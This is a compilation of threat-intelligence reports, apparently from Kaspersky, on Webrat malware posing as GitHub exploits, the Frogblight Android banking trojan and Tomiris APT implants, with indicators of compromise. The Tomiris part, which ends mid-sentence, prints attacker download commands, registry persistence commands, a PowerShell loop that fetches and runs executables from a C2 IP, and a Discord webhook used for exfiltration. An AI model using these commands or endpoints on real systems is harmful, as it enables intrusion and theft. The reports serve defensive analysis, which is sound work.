That LinkedIn message pretending to be job offer could just be malwre.

Telegram mods spread a powerful Android backdoor as banking trojans surge and Joker malware resurfaces on Google Play in Q4 2025, says Doctor Web.

Researchers at Acronis have discovered a new campaign called Boto Cor-de-Rosa, where the Astaroth banking malware spreads like a worm through WhatsApp Web to steal contact lists and banking credentials.

In early 2025, security researchers uncovered a new malware family named Webrat. Initially, the Trojan targeted regular users by disguising itself as cheats for popular games like Rust, Counter-Strike, and Roblox, or as cracked software. In September, the attackers decided to widen their net: alongside gamers and users of pirated software, they are now targeting inexperienced professionals and students in the information security field.

Distribution and the malicious sample

In October, we uncovered a campaign that had been distributing Webrat via GitHub repositories since at least September. To lure in victims, the attackers leveraged vulnerabilities frequently mentioned in security advisories and industry news. Specifically, they disguised their malware as exploits for the following vulnerabilities with high CVSSv3 scores:

CVE	CVSSv3
CVE-2025-59295	8.8
CVE-2025-10294	9.8
CVE-2025-59230	7.8

This is not the first time threat actors have tried to lure security researchers with exploits. Last year, they similarly took advantage of the high-profile RegreSSHion vulnerability, which lacked a working PoC at the time.

In the Webrat campaign, the attackers bait their traps with both vulnerabilities lacking a working exploit and those which already have one. To build trust, they carefully prepared the repositories, incorporating detailed vulnerability information into the descriptions. The information is presented in the form of structured sections, which include:

• Overview with general information about the vulnerability and its potential consequences
• Specifications of systems susceptible to the exploit
• Guide for downloading and installing the exploit
• Guide for using the exploit
• Steps to mitigate the risks associated with the vulnerability

In all the repositories we investigated, the descriptions share a similar structure, characteristic of AI-generated vulnerability reports, and offer nearly identical risk mitigation advice, with only minor variations in wording. This strongly suggests that the text was machine-generated.

The Download Exploit ZIP link in the Download & Install section leads to a password-protected archive hosted in the same repository. The password is hidden within the name of a file inside the archive.

The archive downloaded from the repository includes four files:

1. pass – 8511: an empty file, whose name contains the password for the archive.
2. payload.dll: a decoy, which is a corrupted PE file. It contains no useful information and performs no actions, serving only to divert attention from the primary malicious file.
3. rasmanesc.exe (note: file names may vary): the primary malicious file (MD5 61b1fc6ab327e6d3ff5fd3e82b430315), which performs the following actions:
   • Escalate its privileges to the administrator level (T1134.002).
   • Disable Windows Defender (T1562.001) to avoid detection.
   • Fetch from a hardcoded URL (ezc5510min.temp[.]swtest[.]ru in our example) a sample of the Webrat family and execute it (T1608.001).
4. start_exp.bat: a file containing a single command: start rasmanesc.exe, which further increases the likelihood of the user executing the primary malicious file.

Webrat is a backdoor that allows the attackers to control the infected system. Furthermore, it can steal data from cryptocurrency wallets, Telegram, Discord and Steam accounts, while also performing spyware functions such as screen recording, surveillance via a webcam and microphone, and keylogging. The version of Webrat discovered in this campaign is no different from those documented previously.

Campaign objectives

Previously, Webrat spread alongside game cheats, software cracks, and patches for legitimate applications. In this campaign, however, the Trojan disguises itself as exploits and PoCs. This suggests that the threat actor is attempting to infect information security specialists and other users interested in this topic. It bears mentioning that any competent security professional analyzes exploits and other malware within a controlled, isolated environment, which has no access to sensitive data, physical webcams, or microphones. Furthermore, an experienced researcher would easily recognize Webrat, as it’s well-documented and the current version is no different from previous ones. Therefore, we believe the bait is aimed at students and inexperienced security professionals.

Conclusion

The threat actor behind Webrat is now disguising the backdoor not only as game cheats and cracked software, but also as exploits and PoCs. This indicates they are targeting researchers who frequently rely on open sources to find and analyze code related to new vulnerabilities.

However, Webrat itself has not changed significantly from past campaigns. These attacks clearly target users who would run the “exploit” directly on their machines — bypassing basic safety protocols. This serves as a reminder that cybersecurity professionals, especially inexperienced researchers and students, must remain vigilant when handling exploits and any potentially malicious files. To prevent potential damage to work and personal devices containing sensitive information, we recommend analyzing these exploits and files within isolated environments like virtual machines or sandboxes.

We also recommend exercising general caution when working with code from open sources, always using reliable security solutions, and never adding software to exclusions without a justified reason.

Kaspersky solutions effectively detect this threat with the following verdicts:

• HEUR:Trojan.Python.Agent.gen
• HEUR:Trojan-PSW.Win64.Agent.gen
• HEUR:Trojan-Banker.Win32.Agent.gen
• HEUR:Trojan-PSW.Win32.Coins.gen
• HEUR:Trojan-Downloader.Win32.Agent.gen
• PDM:Trojan.Win32.Generic

Indicators of compromise

Malicious GitHub repositories
https://github[.]com/RedFoxNxploits/CVE-2025-10294-Poc
https://github[.]com/FixingPhantom/CVE-2025-10294
https://github[.]com/h4xnz/CVE-2025-10294-POC
https://github[.]com/usjnx72726w/CVE-2025-59295/tree/main
https://github[.]com/stalker110119/CVE-2025-59230/tree/main
https://github[.]com/moegameka/CVE-2025-59230
https://github[.]com/DebugFrag/CVE-2025-12596-Exploit
https://github[.]com/themaxlpalfaboy/CVE-2025-54897-LAB
https://github[.]com/DExplo1ted/CVE-2025-54106-POC
https://github[.]com/h4xnz/CVE-2025-55234-POC
https://github[.]com/Hazelooks/CVE-2025-11499-Exploit
https://github[.]com/usjnx72726w/CVE-2025-11499-LAB
https://github[.]com/modhopmarrow1973/CVE-2025-11833-LAB
https://github[.]com/rootreapers/CVE-2025-11499
https://github[.]com/lagerhaker539/CVE-2025-12595-POC

Webrat C2
http://ezc5510min[.]temp[.]swtest[.]ru
http://shopsleta[.]ru

MD5
28a741e9fcd57bd607255d3a4690c82f
a13c3d863e8e2bd7596bac5d41581f6a
61b1fc6ab327e6d3ff5fd3e82b430315

Kaspersky warns of 'Frogblight,' a new Android malware draining bank accounts in Turkiye. Learn how this 'court case' scam steals your data and how to stay safe.

Cybersecurity firm Ontinue reveals how the open-source tool Nezha is being used as a Remote Access Trojan (RAT) to bypass security and control servers globally.

In August 2025, we discovered a campaign targeting individuals in Turkey with a new Android banking Trojan we dubbed “Frogblight”. Initially, the malware was disguised as an app for accessing court case files via an official government webpage. Later, more universal disguises appeared, such as the Chrome browser.

Frogblight can use official government websites as an intermediary step to steal banking credentials. Moreover, it has spyware functionality, such as capabilities to collect SMS messages, a list of installed apps on the device and device filesystem information. It can also send arbitrary SMS messages.

Another interesting characteristic of Frogblight is that we’ve seen it updated with new features throughout September. This may indicate that a feature-rich malware app for Android is being developed, which might be distributed under the MaaS model.

This threat is detected by Kaspersky products as HEUR:Trojan-Banker.AndroidOS.Frogblight.*, HEUR:Trojan-Banker.AndroidOS.Agent.eq, HEUR:Trojan-Banker.AndroidOS.Agent.ep, HEUR:Trojan-Spy.AndroidOS.SmsThief.de.

Technical details

Background

While performing an analysis of mobile malware we receive from various sources, we discovered several samples belonging to a new malware family. Although these samples appeared to be still under development, they already contained a lot of functionality that allowed this family to be classified as a banking Trojan. As new versions of this malware continued to appear, we began monitoring its development. Moreover, we managed to discover its control panel and based on the “fr0g” name shown there, we dubbed this family “Frogblight”.

Initial infection

We believe that smishing is one of the distribution vectors for Frogblight, and that the users had to install the malware themselves. On the internet, we found complaints from Turkish users about phishing SMS messages convincing users that they were involved in a court case and containing links to download malware. versions of Frogblight, including the very first ones, were disguised as an app for accessing court case files via an official government webpage and were named the same as the files for downloading from the links mentioned above.

While looking for online mentions of the names used by the malware, we discovered one of the phishing websites distributing Frogblight, which disguises itself as a website for viewing a court file.

We were able to open the admin panel of this website, where it was possible to view statistics on Frogblight malware downloads. However, the counter had not been fully implemented and the threat actor could only view the statistics for their own downloads.

Additionally, we found the source code of this phishing website available in a public GitHub repository. Judging by its description, it is adapted for fast deployment to Vercel, a platform for hosting web apps.

App features

As already mentioned, Frogblight was initially disguised as an app for accessing court case files via an official government webpage. Let’s look at one of the samples using this disguise (9dac23203c12abd60d03e3d26d372253). For analysis, we selected an early sample, but not the first one discovered, in order to demonstrate more complete Frogblight functionality.

After starting, the app prompts the victim to grant permissions to send and read SMS messages, and to read from and write to the device’s storage, allegedly needed to show a court file related to the user.

The full list of declared permissions in the app manifest file is shown below:

• MANAGE_EXTERNAL_STORAGE
• READ_EXTERNAL_STORAGE
• WRITE_EXTERNAL_STORAGE
• READ_SMS
• RECEIVE_SMS
• SEND_SMS
• WRITE_SMS
• RECEIVE_BOOT_COMPLETED
• INTERNET
• QUERY_ALL_PACKAGES
• BIND_ACCESSIBILITY_SERVICE
• DISABLE_KEYGUARD
• FOREGROUND_SERVICE
• FOREGROUND_SERVICE_DATA_SYNC
• POST_NOTIFICATIONS
• QUICKBOOT_POWERON
• RECEIVE_MMS
• RECEIVE_WAP_PUSH
• REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• SCHEDULE_EXACT_ALARM
• USE_EXACT_ALARM
• VIBRATE
• WAKE_LOCK
• ACCESS_NETWORK_STATE
• READ_PHONE_STATE

After all required permissions are granted, the malware opens the official government webpage for accessing court case files in WebView, prompting the victim to sign in. There are different sign-in options, one of them via online banking. If the user chooses this method, they are prompted to click on a bank whose online banking app they use and fill out the sign-in form on the bank’s official website. This is what Frogblight is after, so it waits two seconds, then opens the online banking sign-in method regardless of the user’s choice. For each webpage that has finished loading in WebView, Frogblight injects JavaScript code allowing it to capture user input and send it to the C2 via a REST API.

The malware also changes its label to “Davalarım” if the Android version is newer than 12; otherwise it hides the icon.

The app icon before (left) and after launching (right)
In the sample we review in this section, Frogblight uses a REST API for C2 communication, implemented using the Retrofit library. The malicious app pings the C2 server every two seconds in foreground, and if no error is returned, it calls the REST API client methods fetchOutbox and getFileCommands. Other methods are called when specific events occur, for example, after the device screen is turned on, the com.capcuttup.refresh.PersistentService foreground service is launched, or an SMS is received. The full list of all REST API client methods with parameters and descriptions is shown below.

REST API client method	Description	Parameters
fetchOutbox	Request message content to be sent via SMS or displayed in a notification	device_id: unique Android device ID
ackOutbox	Send the results of processing a message received after calling the API method fetchOutbox	device_id: unique Android device ID msg_id: message ID status: message processing status error: message processing error
getAllPackages	Request the names of app packages whose launch should open a website in WebView to capture user input data	action: same as the API method name
getPackageUrl	Request the website URL that will be opened in WebView when the app with the specified package name is launched	action: same as the API method name package: the package name of the target app
getFileCommands	Request commands for file operations Available commands: ●       download: upload the target file to the C2 ●       generate_thumbnails: generate thumbnails from the image files in the target directory and upload them to the C2 ●       list: send information about all files in the target directory to the C2 ●       thumbnail: generate a thumbnail from the target image file and upload it to the C2	device_id: unique Android device ID
pingDevice	Check the C2 connection	device_id: unique Android device ID
reportHijackSuccess	Send captured user input data from the website opened in a WebView when the app with the specified package name is launched	action: same as the API method name package: the package name of the target app data: captured user input data
saveAppList	Send information about the apps installed on the device	device_id: unique Android device ID app_list: a list of apps installed on the device app_count: a count of apps installed on the device
saveInjection	Send captured user input data from the website opened in a WebView. If it was not opened following the launch of the target app, the app_name parameter is determined based on the opened URL	device_id: unique Android device ID app_name: the package name of the target app form_data: captured user input data
savePermission	Unused but presumably needed for sending information about permissions	device_id: unique Android device ID permission_type: permission type status: permission status
sendSms	Send information about an SMS message from the device	device_id: unique Android device ID sender: the sender’s/recipient’s phone number message: message text timestamp: received/sent time type: message type (inbox/sent)
sendTelegramMessage	Send captured user input data from the webpages opened by Frogblight in WebView	device_id: unique Android device ID url: website URL title: website page title input_type: the type of user input data input_value: user input data final_value: user input data with additional information timestamp: the time of data capture ip_address: user IP address sms_permission: whether SMS permission is granted file_manager_permission: whether file access permission is granted
updateDevice	Send information about the device	device_id: unique Android device ID model: device manufacturer and model android_version: Android version phone_number: user phone number battery: current battery level charging: device charging status screen_status: screen on/off ip_address: user IP address sms_permission: whether SMS permission is granted file_manager_permission: whether file access permission is granted
updatePermissionStatus	Send information about permissions	device_id: unique Android device ID permission_type: permission type status: permission status timestamp: current time
uploadBatchThumbnails	Upload thumbnails to the C2	device_id: unique Android device ID thumbnails: thumbnails
uploadFile	Upload a file to the C2	device_id: unique Android device ID file_path: file path download_id: the file ID on the C2 The file itself is sent as an unnamed parameter
uploadFileList	Send information about all files in the target directory	device_id: unique Android device ID path: directory path file_list: information about the files in the target directory
uploadFileListLog	Send information about all files in the target directory to an endpoint different from uploadFileList	device_id: unique Android device ID path: directory path file_list: information about the files in the target directory
uploadThumbnailLog	Unused but presumably needed for uploading thumbnails to an endpoint different from uploadBatchThumbnails	device_id: unique Android device ID thumbnails: thumbnails

Remote device control, persistence, and protection against deletion

The app includes several classes to provide the threat actor with remote access to the infected device, gain persistence, and protect the malicious app from being deleted.

• capcuttup.refresh.AccessibilityAutoClickService
  This is intended to prevent removal of the app and to open websites specified by the threat actor in WebView upon target apps startup. It is present in the sample we review, but is no longer in use and deleted in further versions.
• capcuttup.refresh.PersistentService
  This is a service whose main purpose is to interact with the C2 and to make malicious tasks persistent.
• capcuttup.refresh.BootReceiver
  This is a broadcast receiver responsible for setting up the persistence mechanisms, such as job scheduling and setting alarms, after device boot completion.

Further development

In later versions, new functionality was added, and some of the more recent Frogblight variants disguised themselves as the Chrome browser. Let’s look at one of the fake Chrome samples (d7d15e02a9cd94c8ab00c043aef55aff).

In this sample, new REST API client methods have been added for interacting with the C2.

REST API client method	Description	Parameters
getContactCommands	Get commands to perform actions with contacts Available commands: ●       ADD_CONTACT: add a contact to the user device ●       DELETE_CONTACT: delete a contact from the user device ●       EDIT_CONTACT: edit a contact on the user device	device_id: unique Android device ID
sendCallLogs	Send call logs to the C2	device_id: unique Android device ID call_logs: call log data
sendNotificationLogs	Send notifications log to the C2. Not fully implemented in this sample, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this API method	action: same as the API method name notifications: notification log data

Also, the threat actor had implemented a custom input method for recording keystrokes to a file using the com.puzzlesnap.quickgame.CustomKeyboardService service.

Another Frogblight sample we observed trying to avoid emulators and using geofencing techniques is 115fbdc312edd4696d6330a62c181f35. In this sample, Frogblight checks the environment (for example, device model) and shuts down if it detects an emulator or if the device is located in the United States.

Later on, the threat actor decided to start using a web socket instead of the REST API. Let’s see an example of this in one of the recent samples (08a3b1fb2d1abbdbdd60feb8411a12c7). This sample is disguised as an app for receiving social support via an official government webpage. The feature set of this sample is very similar to the previous ones, with several new capabilities added. Commands are transmitted over a web socket using the JSON format. A command template is shown below:

{
    "id": <command ID>,
    "command_type": <command name>
    "command_data": <command data>
}

It is also worth noting that some commands in this version share the same meaning but have different structures, and the functionality of certain commands has not been fully implemented yet. This indicates that Frogblight was under active development at the time of our research, and since no its activity was noticed after September, it is possible that the malware is being finalized to a fully operational state before continuing to infect users’ devices. A full list of commands with their parameters and description is shown below:

Command	Description	Parameters
connect	Send a registration message to the C2	–
connection_success	Send various information, such as call logs, to the C2; start pinging the C2 and requesting commands	–
auth_error	Log info about an invalid login key to the Android log system	–
pong_device	Does nothing	–
commands_list	Execute commands	List of commands
sms_send_command	Send an arbitrary SMS message	recipient: message destination message: message text msg_id: message ID
bulk_sms_command	Send an arbitrary SMS message to multiple recipients	recipients: message destinations message: message text
get_contacts_command	Send all contacts to the C2	–
get_app_list_command	Send information about the apps installed on the device to the C2	–
get_files_command	Send information about all files in certain directories to the C2	–
get_call_logs_command	Send call logs to the C2	–
get_notifications_command	Send a notifications log to the C2. This is not fully implemented in the sample at hand, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this command	–
take_screenshot_command	Take a screenshot. This is not fully implemented in the sample at hand, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this command	–
update_device	Send registration message to the C2	–
new_webview_data	Collect WebView data. This is not fully implemented in the sample at hand, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this command	–
new_injection	Inject code. This is not fully implemented in the sample at hand, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this command	code: injected code target_app: presumably the package name of the target app
add_contact_command	Add a contact to the user device	name: contact name phone: contact phone email: contact email
contact_add	Add a contact to the user device	display_name: contact name phone_number: contact phone email: contact email
contact_delete	Delete a contact from the user device	phone_number: contact phone
contact_edit	Edit a contact on the user device	display_name: new contact name phone_number: contact phone email: new contact email
contact_list	Send all contacts to the C2	–
file_list	Send information about all files in the specified directory to the C2	path: directory path
file_download	Upload the specified file to the C2	file_path: file path download_id: an ID that is received with the command and sent back to the C2 along with the requested file. Most likely, this is used to organize data on the C2
file_thumbnail	Generate a thumbnail from the target image file and upload it to the C2	file_path: image file path
file_thumbnails	Generate thumbnails from the image files in the target directory and upload them to the C2	folder_path: directory path
health_check	Send information about the current device state: battery level, screen state, and so on	–
message_list_request	Send all SMS messages to the C2	–
notification_send	Show an arbitrary notification	title: notification title message: notification message app_name: notification subtext
package_list_response	Save the target package names	packages: a list of all target package names. Each list element contains: package_name: target package name active: whether targeting is active
delete_contact_command	Delete a contact from the user device. This is not fully implemented in the sample at hand, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this command	contact_id: contact ID name: contact name
file_upload_command	Upload specified file to the C2. This is not fully implemented in the sample at hand, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this command	file_path: file path file_name: file name
file_download_command	Download file to user device. This is not fully implemented in the sample at hand, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this command	file_url: the URL of the file to download download_path: download path
download_file_command	Download file to user device. This is not fully implemented in the sample at hand, and as of the time of writing this report, we hadn’t seen any samples with a full-fledged implementation of this command	file_url: the URL of the file to download download_path: downloading path
get_permissions_command	Send a registration message to the C2, including info about specific permissions	–
health_check_command	Send information about the current device state, such as battery level, screen state, and so on	–
connect_error	Log info about connection errors to the Android log system	A list of errors
reconnect	Send a registration message to the C2	–
disconnect	Stop pinging the C2 and requesting commands from it	–

Authentication via WebSocket takes place using a special key.

At the IP address to which the WebSocket connection was made, the Frogblight web panel was accessible, which accepted the authentication key mentioned above. Since only samples using the same key as the webpanel login are controllable through it, we suggest that Frogblight might be distributed under the MaaS model.

Judging by the menu options, the threat actor can sort victims’ devices by certain parameters, such as the presence of banking apps on the device, and send bulk SMS messages and perform other mass actions.

Victims

Since some versions of Frogblight opened the Turkish government webpage to collect user-entered data on Turkish banks’ websites, we assume with high confidence that it is aimed mainly at users from Turkey. Also, based on our telemetry, the majority of users attacked by Frogblight are located in that country.

Attribution

Even though it is not possible to provide an attribution to any known threat actor based on the information available, during our analysis of the Frogblight Android malware and the search for online mentions of the names it uses, we discovered a GitHub profile containing repos with Frogblight, which had also created repos with Coper malware, distributed under the MaaS model. It is possible that this profile belongs to the attackers distributing Coper who have also started distributing Frogblight.

Also, since the comments in the Frogblight code are written in Turkish, we believe that its developers speak this language.

Conclusions

The new Android malware we dubbed “Frogblight” appeared recently and targets mainly users from Turkey. This is an advanced banking Trojan aimed at stealing money. It has already infected real users’ devices, and it doesn’t stop there, adding more and more new features in the new versions that appear. It can be made more dangerous by the fact that it may be used by attackers who already have experience distributing malware. We will continue to monitor its development.

Indicators of Compromise

More indicators of compromise, as well as any updates to these, are available to the customers of our crimeware reporting service. If you are interested, please contact crimewareintel@kaspersky.com.

APK file hashes
8483037dcbf14ad8197e7b23b04aea34
105fa36e6f97977587a8298abc31282a
e1cd59ae3995309627b6ab3ae8071e80
115fbdc312edd4696d6330a62c181f35
08a3b1fb2d1abbdbdd60feb8411a12c7
d7d15e02a9cd94c8ab00c043aef55aff
9dac23203c12abd60d03e3d26d372253

C2 domains
1249124fr1241og5121.sa[.]com
froglive[.]net

C2 IPs
45.138.16.208[:]8080

URL of GitHub repository with Frogblight phishing website source code
https://github[.]com/eraykarakaya0020/e-ifade-vercel

URL of GitHub account containing APK files of Frogblight and Coper
https://github[.]com/Chromeapk

Distribution URLs
https://farketmez37[.]cfd/e-ifade.apk
https://farketmez36[.]sbs/e-ifade.apk
https://e-ifade-app-5gheb8jc.devinapps[.]com/e-ifade.apk

VS Code developers beware: ReversingLabs found 19 malicious extensions hiding trojans inside a popular dependency, disguising the final malware payload as a standard PNG image file.

ChrimeraWire is a new Windows trojan that automates web browsing through Chrome to simulate user activity and manipulate search engine rankings.

Cleafy analysis reveals Albiriox, a new Android Malware-as-a-Service (MaaS) RAT that targets over 400 global banking and crypto apps. Learn how ODF fraud enables full device takeover.

All statistics in this report come from Kaspersky Security Network (KSN), a global cloud service that receives information from components in our security solutions voluntarily provided by Kaspersky users. Millions of Kaspersky users around the globe assist us in collecting information about malicious activity. The statistics in this report cover the period from November 2024 through October 2025. The report doesn’t cover mobile statistics, which we will share in our annual mobile malware report.

During the reporting period:

• 48% of Windows users and 29% of macOS users encountered cyberthreats
• 27% of all Kaspersky users encountered web threats, and 33% users were affected by on-device threats
• The highest share of users affected by web threats was in CIS (34%), and local threats were most often detected in Africa (41%)
• Kaspersky solutions prevented nearly 1,6 times more password stealer attacks than in the previous year
• In APAC password stealer detections saw a 132% surge compared to the previous year
• Kaspersky solutions detected 1,5 times more spyware attacks than in the previous year

To find more yearly statistics on cyberthreats view the full report.

While tracking the activities of the Tomiris threat actor, we identified new malicious operations that began in early 2025. These attacks targeted foreign ministries, intergovernmental organizations, and government entities, demonstrating a focus on high-value political and diplomatic infrastructure. In several cases, we traced the threat actor’s actions from initial infection to the deployment of post-exploitation frameworks.

These attacks highlight a notable shift in Tomiris’s tactics, namely the increased use of implants that leverage public services (e.g., Telegram and Discord) as command-and-control (C2) servers. This approach likely aims to blend malicious traffic with legitimate service activity to evade detection by security tools.

Most infections begin with the deployment of reverse shell tools written in various programming languages, including Go, Rust, C/C#/C++, and Python. Some of them then deliver an open-source C2 framework: Havoc or AdaptixC2.

This report in a nutshell:

• New implants developed in multiple programming languages were discovered;
• Some of the implants use Telegram and Discord to communicate with a C2;
• Operators employed Havoc and AdaptixC2 frameworks in subsequent stages of the attack lifecycle.

Kaspersky’s products detect these threats as:

• HEUR:Backdoor.Win64.RShell.gen,
• HEUR:Backdoor.MSIL.RShell.gen,
• HEUR:Backdoor.Win64.Telebot.gen,
• HEUR:Backdoor.Python.Telebot.gen,
• HEUR:Trojan.Win32.RProxy.gen,
• HEUR:Trojan.Win32.TJLORT.a,
• HEUR:Backdoor.Win64.AdaptixC2.a.

For more information, please contact intelreports@kaspersky.com.

Technical details

Initial access

The infection begins with a phishing email containing a malicious archive. The archive is often password-protected, and the password is typically included in the text of the email. Inside the archive is an executable file. In some cases, the executable’s icon is disguised as an office document icon, and the file name includes a double extension such as .doc<dozen_spaces>.exe. However, malicious executable files without icons or double extensions are also frequently encountered in archives. These files often have very long names that are not displayed in full when viewing the archive, so their extensions remain hidden from the user.

Translation:

Subject: The Office of the Government of the Russian Federation on the issue of classification of goods sold in the territory of the Siberian Federal District
Body:
Dear colleagues!
In preparation for the meeting of the Executive Office of the Government of the Russian Federation on the classification of projects implemented in the Siberian Federal District as having a significant impact on the
socioeconomic development of the Siberian District, we request your position on the projects listed in the attached file. The Executive Office of the Government of Russian Federation on the classification of
projects implemented in the Siberian Federal District.
Password: min@2025

When the file is executed, the system becomes infected. However, different implants were often present under the same file names in the archives, and the attackers’ actions varied from case to case.

The implants

Tomiris C/C++ ReverseShell

This implant is a reverse shell that waits for commands from the operator (in most cases that we observed, the infection was human-operated). After a quick environment check, the attacker typically issues a command to download another backdoor – AdaptixC2. AdaptixC2 is a modular framework for post-exploitation, with source code available on GitHub. Attackers use built-in OS utilities like bitsadmin, curl, PowerShell, and certutil to download AdaptixC2. The typical scenario for using the Tomiris C/C++ reverse shell is outlined below.

Environment reconnaissance. The attackers collect various system information, including information about the current user, network configuration, etc.

echo 4fUPU7tGOJBlT6D1wZTUk
whoami
ipconfig /all
systeminfo
hostname
net user /dom
dir 
dir C:\users\[username]

Download of the next-stage implant. The attackers try to download AdaptixC2 from several URLs.

bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe
curl -o $public\libraries\service.exe http://<HOST>/service.exe
certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar
powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'

Verification of download success. Once the download is complete, the attackers check that AdaptixC2 is present in the target folder and has not been deleted by security solutions.

dir $temp
dir $public\libraries

Establishing persistence for the downloaded payload. The downloaded implant is added to the Run registry key.

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpdate /t REG_SZ /d $public\pictures\winupdate.exe /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Win-NetAlone" /t REG_SZ /d "$public\videos\alone.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Winservice" /t REG_SZ /d "$public\Pictures\dwm.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurrentVersion/t REG_SZ /d $public\Pictures\sbschost.exe /f

Verification of persistence success. Finally, the attackers check that the implant is present in the Run registry key.

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

This year, we observed three variants of the C/C++ reverse shell whose functionality ultimately provided access to a remote console. All three variants have minimal functionality – they neither replicate themselves nor persist in the system. In essence, if the running process is terminated before the operators download and add the next-stage implant to the registry, the infection ends immediately.

The first variant is likely based on the Tomiris Downloader source code discovered in 2021. This is evident from the use of the same function to hide the application window.

Below are examples of the key routines for each of the detected variants.

Tomiris Rust Downloader

Tomiris Rust Downloader is a previously undocumented implant written in Rust. Although the file size is relatively large, its functionality is minimal.

Upon execution, the Trojan first collects system information by running a series of console commands sequentially.

"cmd" /C "ipconfig /all"
"cmd" /C "echo %username%"
"cmd" /C hostname
"cmd" /C ver
"cmd" /C curl hxxps://ipinfo[.]io/ip
"cmd" /C curl hxxps://ipinfo[.]io/country

Then it searches for files and compiles a list of their paths. The Trojan is interested in files with the following extensions: .jpg, .jpeg, .png, .txt, .rtf, .pdf, .xlsx, and .docx. These files must be located on drives C:/, D:/, E:/, F:/, G:/, H:/, I:/, or J:/. At the same time, it ignores paths containing the following strings: “.wrangler”, “.git”, “node_modules”, “Program Files”, “Program Files (x86)”, “Windows”, “Program Data”, and “AppData”.

A multipart POST request is used to send the collected system information and the list of discovered file paths to Discord via the URL:

hxxps://discordapp[.]com/api/webhooks/1392383639450423359/TmFw-WY-u3D3HihXqVOOinL73OKqXvi69IBNh_rr15STd3FtffSP2BjAH59ZviWKWJRX

It is worth noting that only the paths to the discovered files are sent to Discord; the Trojan does not transmit the actual files.

The structure of the multipart request is shown below:

Contents of the Content-Disposition header	Description
form-data; name=”payload_json”	System information collected from the infected system via console commands and converted to JSON.
form-data; name=”file”; filename=”files.txt”	A list of files discovered on the drives.
form-data; name=”file2″; filename=”ipconfig.txt”	Results of executing console commands like “ipconfig /all”.

After sending the request, the Trojan creates two scripts, script.vbs and script.ps1, in the temporary directory. Before dropping script.ps1 to the disk, Rust Downloader creates a URL from hardcoded pieces and adds it to the script. It then executes script.vbs using the cscript utility, which in turn runs script.ps1 via PowerShell. The script.ps1 script runs in an infinite loop with a one-minute delay. It attempts to download a ZIP archive from the URL provided by the downloader, extract it to %TEMP%\rfolder, and execute all unpacked files with the .exe extension. The placeholder <PC_NAME> in script.ps1 is replaced with the name of the infected computer.

Content of script.vbs:

Set Shell = CreateObject("WScript.Shell")
Shell.Run "powershell -ep Bypass -w hidden -File %temp%\script.ps1"

Content of script.ps1:

$Url = "hxxp://193.149.129[.]113/<PC_NAME>" 
$dUrl = $Url + "/1.zip" 
while($true){
    try{
        $Response = Invoke-WebRequest -Uri $Url -UseBasicParsing -ErrorAction Stop
        iwr -OutFile $env:Temp\1.zip -Uri $dUrl
        New-Item -Path $env:TEMP\rfolder -ItemType Directory
        tar -xf $env:Temp\1.zip -C $env:Temp\rfolder
        Get-ChildItem $env:Temp\rfolder -Filter "*.exe" | ForEach-Object {Start-Process $_.FullName }
        break
    }catch{
        Start-Sleep -Seconds 60
    }
}

It’s worth noting that in at least one case, the downloaded archive contained an executable file associated with Havoc, another open-source post-exploitation framework.

Tomiris Python Discord ReverseShell

The Trojan is written in Python and compiled into an executable using PyInstaller. The main script is also obfuscated with PyArmor. We were able to remove the obfuscation and recover the original script code. The Trojan serves as the initial stage of infection and is primarily used for reconnaissance and downloading subsequent implants. We observed it downloading the AdaptixC2 framework and the Tomiris Python FileGrabber.

The Trojan is based on the “discord” Python package, which implements communication via Discord, and uses the messenger as the C2 channel. Its code contains a URL to communicate with the Discord C2 server and an authentication token. Functionally, the Trojan acts as a reverse shell, receiving text commands from the C2, executing them on the infected system, and sending the execution results back to the C2.

Tomiris Python FileGrabber

As mentioned earlier, this Trojan is installed in the system via the Tomiris Python Discord ReverseShell. The attackers do this by executing the following console command.

cmd.exe /c "curl -o $public\videos\offel.exe http://<HOST>/offel.exe"

The Trojan is written in Python and compiled into an executable using PyInstaller. It collects files with the following extensions into a ZIP archive: .jpg, .png, .pdf, .txt, .docx, and .doc. The resulting archive is sent to the C2 server via an HTTP POST request. During the file collection process, the following folder names are ignored: “AppData”, “Program Files”, “Windows”, “Temp”, “System Volume Information”, “$RECYCLE.BIN”, and “bin”.

Distopia backdoor

The backdoor is based entirely on the GitHub repository project “dystopia-c2” and is written in Python. The executable file was created using PyInstaller. The backdoor enables the execution of console commands on the infected system, the downloading and uploading of files, and the termination of processes. In one case, we were able to trace a command used to download another Trojan – Tomiris Python Telegram ReverseShell.

Sequence of console commands executed by attackers on the infected system:

cmd.exe /c "dir"
cmd.exe /c "dir C:\user\[username]\pictures"
cmd.exe /c "pwd"
cmd.exe /c "curl -O $public\sysmgmt.exe http://<HOST>/private/svchost.exe"
cmd.exe /c "$public\sysmgmt.exe"

Tomiris Python Telegram ReverseShell

The Trojan is written in Python and compiled into an executable using PyInstaller. The main script is also obfuscated with PyArmor. We managed to remove the obfuscation and recover the original script code. The Trojan uses Telegram to communicate with the C2 server, with code containing an authentication token and a “chat_id” to connect to the bot and receive commands for execution. Functionally, it is a reverse shell, capable of receiving text commands from the C2, executing them on the infected system, and sending the execution results back to the C2.

Initially, we assumed this was an updated version of the Telemiris bot previously used by the group. However, after comparing the original scripts of both Trojans, we concluded that they are distinct malicious tools.

Other implants used as first-stage infectors

Below, we list several implants that were also distributed in phishing archives. Unfortunately, we were unable to track further actions involving these implants, so we can only provide their descriptions.

Tomiris C# Telegram ReverseShell

Another reverse shell that uses Telegram to receive commands. This time, it is written in C# and operates using the following credentials:

